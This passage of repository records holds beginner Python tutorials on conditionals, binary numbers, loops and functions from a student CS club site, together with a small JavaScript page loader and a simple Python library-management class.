indentation, and since if statements must have code nested within, they must also have a colon at the end of the line.\n\nAfter it executes that, it runs the next if statement. You might've realized by now that if the first if statement is false, then the second is guaranteed to be true (if it's not greater than or equal to 13, then it can only be smaller). Similarly, if the second statement is true, then the first one must've been false. In cases like this, you can simplify the code and write:\n\n\t:::python\n\tif age >= 13:\n\t\tprint(\"Welcome!\")\n\telse:\n\t\tprint(\"You're not allowed to sign up! But feel free to come back when you're older :)\")\n\nYou can go further, and chain if statements using \"else if\" statements, called `elif` in Python.\n\n\t::python\n\tif age > 13:\n\t\tprint(\"Welcome!\")\n\telif age == 13:\n\t\tprint(\"You came back for us!\")\n\telse:\n\t\tprint(\"You're not allowed to sign up! But feel free to come back when you're older :)\")\n\n\n<figcaption>Here's the logic of the program in a flow chart form</figcaption>\n\nFor the `elif` and `else` branch to even be considered, the `if` branch **must** be false. And for the `else` branch to run, both the `if` and the `elif` **must** be false.\n\nYou can continue the chain and add as many `elif` statements as you please.\n\n\t::python\n\tif name == \"Amr\":\n\t\tprint(\"Welcome President!\")\n\t\tprint(\"Because you're special, can I have your lucky number?\")\n\t\tinput(\"Pretty please? \")\n\t\tprint(\"Thanks! I'll be sure to use it\") # He doesn't use it\n\telif name == \"Talida\":\n\t\tprint(\"Welcome Vice President!\")\n\telif name == \"Hagar\":\n\t\tprint(\"Welcome Secretary!\")\n\telif name == \"Catherine\":\n\t\tprint(\"Welcome Social Media Officer!\")\n\telse:\n\t\tprint(\"Welcome \" + name + \"!\")\n\tprint(\"How are you doing?\")\n<figcaption>The \"#\" character means that anything after is a comment. Comments are ignored by Python.</figcaption>\n\nI assume there are some questions going through your head. What's `int` and what does it do? Why do we use `==` to compare things? If the if statement still seems like magic, then don't worry, all these questions will be covered next article, when we go over data types. 
For now, I recommend you simply focus on the patterns.\n\n## Exercise\nWrite a program which prints your letter grade given the class score.\n\nWhen you're ready, you can read start reading the [next](index3.html) article.\n"
},
{
"alpha_fraction": 0.7035490870475769,
"alphanum_fraction": 0.7320806980133057,
"avg_line_length": 67.42857360839844,
"blob_id": "8f701563193da2a8f36a9b26efb37a954fc64d62",
"content_id": "1ccd334f20d6c1c5a8b750454632a644cb9bd2fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7185,
"license_type": "no_license",
"max_line_length": 757,
"num_lines": 105,
"path": "/articles/binary/index.md",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "\n<figcaption>Author: Amr Ojjeh</figcaption>\n<figcaption>Cover By: Amr Ojjeh</figcaption>\n<figcaption>Last updated: August 17, 2021</figcaption>\n\n# Counting With Light Switches\n\nPeople are familiar counting with their two hands. However, how is a computer able to count using electricity?\n\nSuppose for one second that you had a single light switch. Light switches can only be in two states, either on or off. You could say, that when the light switch is off, that signifies the number 0. When it is on, it represents 1.\n\n\n\nOk, but that's pretty boring. We can't count beyond 1. Well, that's easy to fix, just add more light switches!\n\nAh, but hold on. How do we count with just two light switches? Well, we can say that if all the light switches are off, then that should definitely be 0. How do we represent one, however? Should it matter if the first or second light switch is on?\n\nLet's assume that order shouldn't matter. That means, these are all the possible quantities:\n\n\n\nWell, this is rather redundant. If the order doesn't matter, then we'll be wasting light switches, as there are two ways to represent one! And in the case of three light switches, there would be three different ways to represent one and so forth, until we get to N light switches, and there would be N ways to talk of one, as we're essentially just counting how many switches are on to count.\n\nSo, let's instead try it *with* order, as in, the number will depend on *which* switches are on:\n\n\n\nNow every combination is unique, allowing us to count up to 3. What happens if we add another light switch?\n\n\n\nWith only three light switches, we can count up to 7! With 4 light switches, we can count up to 15. Another light switch, and we can count up to 31. Do you see the pattern?\n\n## Binary\n\nFirstly, let's make it easier for ourselves. Instead of using light switches, we can use 0 or 1 for each light switch. So, 100<sub>2</sub> would be 4. You might've seen this format else where, where you count with only 0s and 1s, and that is called binary. I'll be denoting binary numbers with a subscript of 2, so that it is not confused with our regular counting numbers.\n\nSecondly, what is up with the pattern? Well, when there was only one light switch, it could've only been on, 1<sub>2</sub>, or off, 0<sub>2</sub>. That is two combinations. Adding another light switch, we have the combinations: 0<sub>2</sub>, 1<sub>2</sub>, 10<sub>2</sub>, and 11<sub>2</sub>. Those are four different combinations. Another light switch, we would have 8 combinations. This is the case because when adding a new light switch, all the previous states carry over, and then the same states could be repeated, this time with the new light switch turned on, doubling the combinations.\n\nMathematically, this could be represented as 2<sup>n</sup>, where n is the number of light switches. We can figure that with 4 light switches, we can count up to 7, as there are 8 different combinations, with 0 being one of them.\n\n## Computers\n\nIt's likely you've heard of 32-bit and 64-bit systems. You might've also been programming, and have seen 2 byte integers, as well as 4 bytes, and so forth. If you're reading the news, you might've also heard about q-bits, also known as quantum bits. We won't be talking about q-bits, as I myself do not fully understand them, and they're only used in special computations. However, most computers use this light switch system we've developed. 
This is because electrical components can only send, or not send, as in, they can only be on or off for a duration of time. That is how many computer circuits send information, under a type of signal called digital signal. Here's what sending a byte, which could be thought of as 8 light switches, would look like:\n\n\n\n## Python\n\nYou can also represent binary in Python. This can be done by appending `0b` next to your binary number.\n\n\t:::py\n\ttest = 0b1010\n\tprint(test) # 10\n\nNotice that Python didn't print 1010, instead it printed 10. This is because binary numbers are still numbers, and so Python will treat it as it would any regular number, regardless of how you choose to type the number. `print`, by default, prints number in the regular way, which is why it prints 10, as 1010 is equivalent to 10.\n\n## Beyond Counting\n\nHow do we know that 1010<sub>2</sub> is 10, however? We can easily count, but if we're dealing with a large number, do we really want to count?\n\nWe can start by looking at the order again. With the first switch, it can either be 1<sub>2</sub> or 0<sub>2</sub>. Then, the addition of the second switch doubles our combinations, meaning it could either be 0<sub>2</sub>, 1<sub>2</sub>, 10<sub>2</sub>, and 11<sub>2</sub>. This is nothing new, but here's what is. Since the second light switch is just the second digit, we know that when it's turned on by itself, it's equivalent to 2, since 10<sub>2</sub> = 2. What if we only turn on the third light switch? That's 100<sub>2</sub> = 4. Finally, 1000<sub>2</sub> = 8.\n\nNotice the pattern! Every digit, when turned alone, is equivalent to 2<sup>n</sup>, where n is the digit its in. Knowing this, we can break up binary numbers using simple arithmetic: 1010<sub>2</sub> = 1000<sub>2</sub> + 000<sub>2</sub> + 10<sub>2</sub> + 0<sub>2</sub>, or: 1 * 2<sup>3</sup> + 0 * 2<sup>2</sup> + 1 * 2<sup>1</sup> + 0 * 2<sup>0</sup>, which is equal to: 8 + 0 + 2 + 0 = 10.\n\nThis is what the process looks like in code:\n\n\t:::py\n\tbinary = input(\"Enter a number in binary: \")\n\n\tcounter = len(binary) - 1\n\tnumber = 0\n\tfor i in binary:\n\t\tif i == \"1\":\n\t\t\tnumber += 2**counter # The ** means exponent. So 2**4 = 2^4\n\t\tcounter -= 1\n\t\n\tprint(\"The equivalent in decimal is: \" + str(number))\n\nNotice that I called our regular counting system \"decimal.\" This is not to be confused with the decimal point. In the same way that **bi**-nary is about digits with only *two* states, 1 or 0, **deci**-mal is about digits with *ten* states, going from 0 to 9. Similarily, **hexa**-decimal is about digits with *sixteen* different states, from 0 to F. There are an infinite number of counting systems, since you could represent numbers using any number of states greater than 1.\n\nAlso, if you know your Python really well, you can convert from decimal to binary in a single line:\n\n\t:::py\n\tbinary = input(\"Enter a number in binary: \")\n\tnumber = reduce(lambda x, y: (x << 1) + (1 if y == \"1\" else 0), binary, 0)\n\tprint(\"The equivalent in decimal is: \" + str(number))\n\n## Exercise\n\nI've demonstrated how to go from binary to decimal, but what about the other way? I'll explain the technique, and then for the exercise, you can implement the program to convert from decimal to binary.\n\nGiven a decimal number, you must divide by 2, and the remainder of the division will become a binary digit. Keep dividing the number by 2 until you're left with 0. 
Here's how we would convert the number 18:\n\n\t18 / 2 = 9 R: 0\n\t9 / 2 = 4 R: 1\n\t4 / 2 = 2 R: 0\n\t2 / 2 = 1 R: 0\n\t1 / 2 = 0 R: 1\n\n10010<sub>2</sub> = 18\n\nGood luck on writing your program! And as always, hope you learned something new.\n\nAs always, hope you learned something new today!\n"
},
{
"alpha_fraction": 0.669735312461853,
"alphanum_fraction": 0.6962025165557861,
"avg_line_length": 37.05839538574219,
"blob_id": "493bf1b7bf8c023d8fa0fb726a42e3ab1cec9ea9",
"content_id": "13cfb1d7f97090b28da2881b2bb55e70b8757922",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5214,
"license_type": "no_license",
"max_line_length": 379,
"num_lines": 137,
"path": "/articles/intro/index4.md",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "\n<figcaption>Author: Amr Ojjeh</figcaption>\n<figcaption>Cover By: Amr Ojjeh</figcaption>\n<figcaption>Last updated: June 6, 2021</figcaption>\n\n# Loops and Functions\n\nIf you've not read the previous article, I encourage you to go [back](index3.html) and read it.\n\nWe're getting close! After this article, we'll be writing Hangman! But first, we must cover loops and functions.\n\n## Loops\n\nWe've already covered lists in our previous [article](index3.html#lists). Specifically, we've covered: accessing an item in a list, finding the length of a list, adding to a list, and removing from a list. But we still don't know how we'd go about incrementing every value in a list. We could do something like this:\n\n\t:::python\n\ttest = [1, 2, 3, 4]\n\ttest[0] = test[0] + 1\n\ttest[1] = test[0] + 1\n\ttest[2] = test[0] + 1\n\ttest[3] = test[0] + 1\n\tprint(test) # [2, 3, 4, 5]\n\nHowever, this would not be practical for any large list, and it would fail if the list were to change its size. So, as we've done in the past, we introduce a new feature: For Loops.\n\nThe concept is very simple. We need a way to go through every item in the list. Here's how we do that:\n\n\t:::python\n\ttest = [12, 14, 11, 2, 4]\n\tfor i in test:\n\t\tprint(i)\n\t# Output:\n\t# 12\n\t# 14\n\t# 11\n\t# 2\n\t# 4\n\nThe `i` is variable with an arbitrary name, meaning we can give it any name:\n\n\t:::python\n\ttest = [12, 14, 11, 2, 4]\n\tfor hello in test:\n\t\tprint(hello)\n\t# Same output as before\n\nThe variable `i` and `hello` are like any other variable, except Python will automatically change them value to be the next value in the list after the code within the for loop is run. That is how this for loop is able to print every value in the list on a separate line.\n\nNotice though, that if we try to change the variable:\n\n\t:::python\n\ttest = [12, 14, 11, 2, 4]\n\tfor num in test:\n\t\tnum = 1\n\tprint(test) # [12, 14, 2, 4]\n\nThe value of the list does *not* change. That is because `num` is a copy of each item, and not the item itself. More can be written about this later, but for now, our problem remains, how do we change the value of each item?\n\nWe already know how to change the value of one item:\n\n\t:::python\n\ttest = [12, 14, 11, 2, 4]\n\ttest[0] = 4\n\nAnd we know how to get the length of a list:\n\n\t:::python\n\ttest = [12, 14, 11, 2, 4]\n\tlen(test)\n\nSo, if we can loop through a list which simply increments from 0 to the specified length, then we can change every item. Fortunately, there's a `range` function which does exactly that.\n\n\t:::python\n\ttest = [12, 14, 11, 2, 4]\n\tfor i in range(len(test)):\n\t\ttest[i] = 1\n\tprint(test) # [1, 1, 1, 1, 1]\n\nAnd if we want to increment every item then multiply it by two:\n\n\t:::python\n\ttest = [12, 14, 11, 2, 4]\n\tfor i in range(len(test)):\n\t\ttest[i] += 1\n\t\ttest[i] *= 2\n\t\t# += is just a short hand for test[i] = test[i] + 1\n\t\t# Similar shorthands exist, such as -=, *=, and /=, plus a few more.\n\tprint(test) # [26, 30, 24, 6, 10]\n\n## Functions\n\nFunctions are no new concept. We've been using them since the very beginning. `print`, `input`, `int`, `str`, `len`, `range` are all functions. For this section, we'll simply learn how to define our own.\n\nTo do this, we use the `def` keyword, followed by the name of the function, then the parameters, which could be empty, then the code itself. 
Here's an example:\n\n\t:::python\n\tdef my_len(xs):\n\t\tcounter = 0\n\t\tfor i in xs:\n\t\t\tcounter += 1\n\t\treturn counter\n\nThis function, called `my_len`, takes a list, which it refers to as `xs`, and counts for every item in the list. Effectively, we've recreated the `len` function. To use this function:\n\n\t:::python\n\tdef my_len(xs):\n\t\tcounter = 0\n\t\tfor i in xs:\n\t\t\tcounter += 1\n\t\treturn counter\n\n\tprint(my_len([-2, 1, 2, 3, 4, \"cool\"])) # 6\n\nNotice the new `return` keyword. It simply means that the function will be substituted with this return value, which in this is `counter`. So, the function call `my_len([-2, 1, 2, 3, 4, \"cool\"])`, is evaluated as `6`, and so the code is equivalent to `print(6)`.\n\n[Earlier](index1.html#input), I've said that some functions don't return a \"useful\" value, such as `print`. Here's how we define a function that doesn't return a \"useful\" value:\n\n\t:::python\n\tdef print_menu():\n\t\tprint(\"Here are your options!\")\n\t\tprint(\"A. This is option A\")\n\t\tprint(\"B. This is option B\")\n\t\tprint(\"C. This is option C\")\n<figcaption markdown=\"span\">Notice the empty paranthesis after `test`. This means the function takes no arguments.</figcaption>\n\nAs you can see, there is no explicit return value. However, by default, this function will return the special `None` value, as you can see:\n\n\t:::python\n\tval = print_menu()\n\tprint(val) # None\n\nThe `None` value is of its own type, which carries no significant data. It's most often used as just a temporary placeholder for a variable, or in this case, for functions which do not return anything significant. There are more useful cases for it. For instance, a search function may return the first item which matches a criteria, or it may return None if no such item exists.\n\n## Exercise\nWrite a function which given a word and a list of letters, it will return the subset of letters which are in the word.\n\nWhen you're ready, you can read start reading the [next](index5.html) article.\n"
},
{
"alpha_fraction": 0.67912358045578,
"alphanum_fraction": 0.6993550658226013,
"avg_line_length": 116.91666412353516,
"blob_id": "d1b48ccd620b4f382b1dfdd5fd7fbd8b2b2b7110",
"content_id": "a5679179735d0a2aed5235104605133bbcadc741",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 11321,
"license_type": "no_license",
"max_line_length": 764,
"num_lines": 96,
"path": "/articles/binary/index.html",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n<html>\n<head><meta charset='utf-8'>\n<meta http-equiv='X-UA-Compatible' content='IE=edge'>\n<title>LSC CS</title>\n<meta name='viewport' content='width=device-width, initial-scale=1'>\n<meta content=\"Counting With Light Switches\" property=\"og:title\">\n<meta content=\"People are familiar counting with their two hands. However, how is a computer able to count using electricity?\" property=\"og:description\">\n<meta content=\"http://cyfaircs.github.io/articles/binary/index.html\" property=\"og:url\">\n<meta content=\"http://cyfaircs.github.io/articles/binary/cover.png\" property=\"og:image\">\n<meta content=\"#32CCFF\" property=\"theme-color\">\n<link href=\"https://fonts.googleapis.com/css?family=Open+Sans\" rel=\"stylesheet\">\n<link rel=\"stylesheet\" type=\"text/css\" href=\"../../base.css\">\n<link rel=\"stylesheet\" media=\"screen\" type=\"text/css\" href=\"../monokai.css\">\n<link rel=\"stylesheet\" media=\"print\" type=\"text/css\" href=\"../friendly.css\">\n<link rel='stylesheet' type='text/css' href='../article.css'>\n</head>\n<body>\n<header>\n<a class=\"underline\" href=\"../../index.html\">←</a>\n</header>\n\n<article>\n<p><img alt=\"\" src=\"cover.png\"></p>\n<figcaption>Author: Amr Ojjeh</figcaption>\n<figcaption>Cover By: Amr Ojjeh</figcaption>\n<figcaption>Last updated: August 17, 2021</figcaption>\n\n<h1 id=\"counting-with-light-switches\">Counting With Light Switches</h1>\n<p>People are familiar counting with their two hands. However, how is a computer able to count using electricity?</p>\n<p>Suppose for one second that you had a single light switch. Light switches can only be in two states, either on or off. You could say, that when the light switch is off, that signifies the number 0. When it is on, it represents 1.</p>\n<p><img alt=\"\" src=\"first.png\"></p>\n<p>Ok, but that's pretty boring. We can't count beyond 1. Well, that's easy to fix, just add more light switches!</p>\n<p>Ah, but hold on. How do we count with just two light switches? Well, we can say that if all the light switches are off, then that should definitely be 0. How do we represent one, however? Should it matter if the first or second light switch is on?</p>\n<p>Let's assume that order shouldn't matter. That means, these are all the possible quantities:</p>\n<p><img alt=\"\" src=\"second.png\"></p>\n<p>Well, this is rather redundant. If the order doesn't matter, then we'll be wasting light switches, as there are two ways to represent one! And in the case of three light switches, there would be three different ways to represent one and so forth, until we get to N light switches, and there would be N ways to talk of one, as we're essentially just counting how many switches are on to count.</p>\n<p>So, let's instead try it <em>with</em> order, as in, the number will depend on <em>which</em> switches are on:</p>\n<p><img alt=\"\" src=\"third.png\"></p>\n<p>Now every combination is unique, allowing us to count up to 3. What happens if we add another light switch?</p>\n<p><img alt=\"\" src=\"fourth.png\"></p>\n<p>With only three light switches, we can count up to 7! With 4 light switches, we can count up to 15. Another light switch, and we can count up to 31. Do you see the pattern?</p>\n<h2 id=\"binary\">Binary</h2>\n<p>Firstly, let's make it easier for ourselves. Instead of using light switches, we can use 0 or 1 for each light switch. So, 100<sub>2</sub> would be 4. You might've seen this format else where, where you count with only 0s and 1s, and that is called binary. 
I'll be denoting binary numbers with a subscript of 2, so that it is not confused with our regular counting numbers.</p>\n<p>Secondly, what is up with the pattern? Well, when there was only one light switch, it could've only been on, 1<sub>2</sub>, or off, 0<sub>2</sub>. That is two combinations. Adding another light switch, we have the combinations: 0<sub>2</sub>, 1<sub>2</sub>, 10<sub>2</sub>, and 11<sub>2</sub>. Those are four different combinations. Another light switch, we would have 8 combinations. This is the case because when adding a new light switch, all the previous states carry over, and then the same states could be repeated, this time with the new light switch turned on, doubling the combinations.</p>\n<p>Mathematically, this could be represented as 2<sup>n</sup>, where n is the number of light switches. We can figure that with 4 light switches, we can count up to 7, as there are 8 different combinations, with 0 being one of them.</p>\n<h2 id=\"computers\">Computers</h2>\n<p>It's likely you've heard of 32-bit and 64-bit systems. You might've also been programming, and have seen 2 byte integers, as well as 4 bytes, and so forth. If you're reading the news, you might've also heard about q-bits, also known as quantum bits. We won't be talking about q-bits, as I myself do not fully understand them, and they're only used in special computations. However, most computers use this light switch system we've developed. This is because electrical components can only send, or not send, as in, they can only be on or off for a duration of time. That is how many computer circuits send information, under a type of signal called digital signal. Here's what sending a byte, which could be thought of as 8 light switches, would look like:</p>\n<p><img alt=\"\" src=\"fifth.png\"></p>\n<h2 id=\"python\">Python</h2>\n<p>You can also represent binary in Python. This can be done by appending <code>0b</code> next to your binary number.</p>\n<div class=\"codehilite\"><pre><span></span><code><span class=\"n\">test</span> <span class=\"o\">=</span> <span class=\"mb\">0b1010</span>\n<span class=\"nb\">print</span><span class=\"p\">(</span><span class=\"n\">test</span><span class=\"p\">)</span> <span class=\"c1\"># 10</span>\n</code></pre></div>\n\n<p>Notice that Python didn't print 1010, instead it printed 10. This is because binary numbers are still numbers, and so Python will treat it as it would any regular number, regardless of how you choose to type the number. <code>print</code>, by default, prints number in the regular way, which is why it prints 10, as 1010 is equivalent to 10.</p>\n<h2 id=\"beyond-counting\">Beyond Counting</h2>\n<p>How do we know that 1010<sub>2</sub> is 10, however? We can easily count, but if we're dealing with a large number, do we really want to count?</p>\n<p>We can start by looking at the order again. With the first switch, it can either be 1<sub>2</sub> or 0<sub>2</sub>. Then, the addition of the second switch doubles our combinations, meaning it could either be 0<sub>2</sub>, 1<sub>2</sub>, 10<sub>2</sub>, and 11<sub>2</sub>. This is nothing new, but here's what is. Since the second light switch is just the second digit, we know that when it's turned on by itself, it's equivalent to 2, since 10<sub>2</sub> = 2. What if we only turn on the third light switch? That's 100<sub>2</sub> = 4. Finally, 1000<sub>2</sub> = 8.</p>\n<p>Notice the pattern! Every digit, when turned alone, is equivalent to 2<sup>n</sup>, where n is the digit its in. 
Knowing this, we can break up binary numbers using simple arithmetic: 1010<sub>2</sub> = 1000<sub>2</sub> + 000<sub>2</sub> + 10<sub>2</sub> + 0<sub>2</sub>, or: 1 * 2<sup>3</sup> + 0 * 2<sup>2</sup> + 1 * 2<sup>1</sup> + 0 * 2<sup>0</sup>, which is equal to: 8 + 0 + 2 + 0 = 10.</p>\n<p>This is what the process looks like in code:</p>\n<div class=\"codehilite\"><pre><span></span><code><span class=\"n\">binary</span> <span class=\"o\">=</span> <span class=\"nb\">input</span><span class=\"p\">(</span><span class=\"s2\">"Enter a number in binary: "</span><span class=\"p\">)</span>\n\n<span class=\"n\">counter</span> <span class=\"o\">=</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">binary</span><span class=\"p\">)</span> <span class=\"o\">-</span> <span class=\"mi\">1</span>\n<span class=\"n\">number</span> <span class=\"o\">=</span> <span class=\"mi\">0</span>\n<span class=\"k\">for</span> <span class=\"n\">i</span> <span class=\"ow\">in</span> <span class=\"n\">binary</span><span class=\"p\">:</span>\n <span class=\"k\">if</span> <span class=\"n\">i</span> <span class=\"o\">==</span> <span class=\"s2\">"1"</span><span class=\"p\">:</span>\n <span class=\"n\">number</span> <span class=\"o\">+=</span> <span class=\"mi\">2</span><span class=\"o\">**</span><span class=\"n\">counter</span> <span class=\"c1\"># The ** means exponent. So 2**4 = 2^4</span>\n <span class=\"n\">counter</span> <span class=\"o\">-=</span> <span class=\"mi\">1</span>\n\n<span class=\"nb\">print</span><span class=\"p\">(</span><span class=\"s2\">"The equivalent in decimal is: "</span> <span class=\"o\">+</span> <span class=\"nb\">str</span><span class=\"p\">(</span><span class=\"n\">number</span><span class=\"p\">))</span>\n</code></pre></div>\n\n<p>Notice that I called our regular counting system \"decimal.\" This is not to be confused with the decimal point. In the same way that <strong>bi</strong>-nary is about digits with only <em>two</em> states, 1 or 0, <strong>deci</strong>-mal is about digits with <em>ten</em> states, going from 0 to 9. Similarily, <strong>hexa</strong>-decimal is about digits with <em>sixteen</em> different states, from 0 to F. 
There are an infinite number of counting systems, since you could represent numbers using any number of states greater than 1.</p>\n<p>Also, if you know your Python really well, you can convert from decimal to binary in a single line:</p>\n<div class=\"codehilite\"><pre><span></span><code><span class=\"n\">binary</span> <span class=\"o\">=</span> <span class=\"nb\">input</span><span class=\"p\">(</span><span class=\"s2\">"Enter a number in binary: "</span><span class=\"p\">)</span>\n<span class=\"n\">number</span> <span class=\"o\">=</span> <span class=\"n\">reduce</span><span class=\"p\">(</span><span class=\"k\">lambda</span> <span class=\"n\">x</span><span class=\"p\">,</span> <span class=\"n\">y</span><span class=\"p\">:</span> <span class=\"p\">(</span><span class=\"n\">x</span> <span class=\"o\"><<</span> <span class=\"mi\">1</span><span class=\"p\">)</span> <span class=\"o\">+</span> <span class=\"p\">(</span><span class=\"mi\">1</span> <span class=\"k\">if</span> <span class=\"n\">y</span> <span class=\"o\">==</span> <span class=\"s2\">"1"</span> <span class=\"k\">else</span> <span class=\"mi\">0</span><span class=\"p\">),</span> <span class=\"n\">binary</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">)</span>\n<span class=\"nb\">print</span><span class=\"p\">(</span><span class=\"s2\">"The equivalent in decimal is: "</span> <span class=\"o\">+</span> <span class=\"nb\">str</span><span class=\"p\">(</span><span class=\"n\">number</span><span class=\"p\">))</span>\n</code></pre></div>\n\n<h2 id=\"exercise\">Exercise</h2>\n<p>I've demonstrated how to go from binary to decimal, but what about the other way? I'll explain the technique, and then for the exercise, you can implement the program to convert from decimal to binary.</p>\n<p>Given a decimal number, you must divide by 2, and the remainder of the division will become a binary digit. Keep dividing the number by 2 until you're left with 0. Here's how we would convert the number 18:</p>\n<div class=\"codehilite\"><pre><span></span><code>18 / 2 = 9 R: 0\n9 / 2 = 4 R: 1\n4 / 2 = 2 R: 0\n2 / 2 = 1 R: 0\n1 / 2 = 0 R: 1\n</code></pre></div>\n\n<p>10010<sub>2</sub> = 18</p>\n<p>Good luck on writing your program! And as always, hope you learned something new.</p>\n<p>As always, hope you learned something new today!</p>\n</article>\n</body>\n</html>"
},
{
"alpha_fraction": 0.6587677597999573,
"alphanum_fraction": 0.661927342414856,
"avg_line_length": 31.461538314819336,
"blob_id": "d8f9c3870a4c35233ff378dd17d9d2c07b1cd039",
"content_id": "d686208b18f2b12a77d84e5595c44164fd5764f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1266,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 39,
"path": "/index.js",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "// Global variables are defined in data.js\n\ninit();\n\nfunction init() // Initializes the site by loading everything neccessary\n{\n\tloadProjects(projects);\n}\n\nfunction loadProjects(parent) // Loads projects from Projects and displays them according to the category\n{\n\tparent.innerHTML = \"\";\n\tvar sorted_articles = []\n\tfor (var article in Articles)\n\t\tsorted_articles.push(Articles[article])\n\tsorted_articles.sort((a, b) => {\n\t\tlet a_val = (new Date(a[\"Date\"])).valueOf();\n\t\tlet b_val = (new Date(b[\"Date\"])).valueOf();\n\t\treturn b_val - a_val;\n\t});\n\tconsole.log(sorted_articles);\n\tfor (var article in sorted_articles)\n\t\taddProject(sorted_articles[article], parent);\n}\n\nfunction addProject(project, parent) // Adds a project and displays\n{\n\tvar html = generateHTML(project.Name, project.Description, project.Link, project.Date);\n\tparent.innerHTML += html;\n}\n\nfunction generateHTML(name, description, link, date) // Generates the HTML of a project\n{\n\tvar header = '<div><a href=\"' + link + '/index.html\"><img src=\"' + link + '/cover.png' + '\"></a>';\n\tvar h1 = '<h1><a class=\"underline\" href=\"' + link + '/index.html\">' + name + '</a></h1>';\n\tvar date = \"<i>Last updated: \" + date + \"</i>\"\n\tvar p = \"<p>\" + description + \"</p>\";\n\treturn header + h1 + date + p + \"</div>\";\n}\n"
}
] | 14 |
alexNgari/Library_class_lab
|
https://github.com/alexNgari/Library_class_lab
|
c856b056cc4b40c59d315445456549fce76d4494
|
7eddabeec5e6a124d5fd50660abfa36715462c9c
|
a731dc8de034bf01686a48a75cec166e2490e19d
|
refs/heads/master
| 2020-04-08T01:03:56.834953 | 2018-11-23T21:38:13 | 2018-11-23T21:38:13 | 158,879,741 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8303571343421936,
"alphanum_fraction": 0.8303571343421936,
"avg_line_length": 112,
"blob_id": "f047565e4c570abfc9fca2c4a4922156dee58b0e",
"content_id": "b796cb41e2cd0209f2b7ea4791e9c0cdafd09801",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 112,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 1,
"path": "/README.MD",
"repo_name": "alexNgari/Library_class_lab",
"src_encoding": "UTF-8",
"text": "This is a simple library management system, created with the aim of introducing self to Test Driven Development."
},
{
"alpha_fraction": 0.5955755114555359,
"alphanum_fraction": 0.6028344035148621,
"avg_line_length": 31.51685333251953,
"blob_id": "0d012e554a351f75a3db20f003fe5a6f610c5398",
"content_id": "b984acc74dde4ef6c833e3def71a66bf03de3da8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2893,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 89,
"path": "/books.py",
"repo_name": "alexNgari/Library_class_lab",
"src_encoding": "UTF-8",
"text": "class Book:\n def __init__(self, bookNumber, title, author, price = 0, numberOfCopies = 0): # initialise book\n self.bookNumber = bookNumber\n self.title = title\n self.author = author\n self.price = price\n self.numberOfCopies = numberOfCopies\n\n\n def setPrice(self, price):\n self.price = price\n\n\n def setNumberOfCopies(self, numberOfCopies):\n self.numberOfCopies = numberOfCopies\n\n\nclass Library:\n def __init__(self): # initialise library\n self.bookNumbers = []\n self.mapOfBooks = []\n\n\n def findBook(self, title):\n result = []\n for book in self.mapOfBooks:\n if book.title == title:\n result.append({'title': book.title, 'book number': book.bookNumber})\n return result\n\n\n def insertNewBook(self, book): # insert a new book entry into the library\n if book.bookNumber in self.bookNumbers:\n raise Exception('Duplicate book numbers!')\n else:\n self.mapOfBooks.append(book)\n self.bookNumbers.append(book.bookNumber)\n \n\n def retrieveBook(self, bookNumber): # remove one copy of a book from the library\n if bookNumber in self.bookNumbers:\n position = self.bookNumbers.index(bookNumber)\n book = self.mapOfBooks[position]\n if book.numberOfCopies > 0:\n self.mapOfBooks[position].numberOfCopies -= 1\n return book\n else:\n raise ValueError('All copies of {} have been lent out.'.format(book.title))\n else:\n raise IndexError('Book does not exist!')\n\n\n def insertBook(self, bookNumber):\n if bookNumber in self.bookNumbers:\n position = self.bookNumbers.index(bookNumber)\n self.mapOfBooks[position].numberOfCopies += 1\n else:\n raise IndexError('Book does not exist!')\n\n\n def removeBook(self, bookNumber):\n if bookNumber in self.bookNumbers:\n position = self.bookNumbers.index(bookNumber)\n del self.mapOfBooks[position]\n del self.bookNumbers[position]\n else:\n raise IndexError('Book does not exist!')\n\n def listBooks(self):\n listOfBooks = []\n for book in self.mapOfBooks:\n listOfBooks.append({'Book number': book.bookNumber, 'title': book.title})\n return listOfBooks\n\n\n##################################################################################################\n#library = Library()\n#book1 = Book(1, 'The Wizard of Oz', 'Pink Panther', 20, 10)\n#library.insertNewBook(book1)\n#print(library.listBooks())\n#print(library.findBook('The Wizard of Oz'))\n#for i in range(10):\n# library.retrieveBook(1)\n#book2 = library.retrieveBook(1)\n#print(book2.numberOfCopies)\n#library.returnBook(1)\n#print(book2.numberOfCopies)\n#library.removeBook(1)\n#print(library.listBooks())"
},
{
"alpha_fraction": 0.630932629108429,
"alphanum_fraction": 0.6491868495941162,
"avg_line_length": 32.120880126953125,
"blob_id": "ec98b97488ae2829f17a89d7d2c2b7b5f57a06c7",
"content_id": "2bf99f3979d09c447bdbb0a9f3b2d8326cfdfdaa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3013,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 91,
"path": "/test.py",
"repo_name": "alexNgari/Library_class_lab",
"src_encoding": "UTF-8",
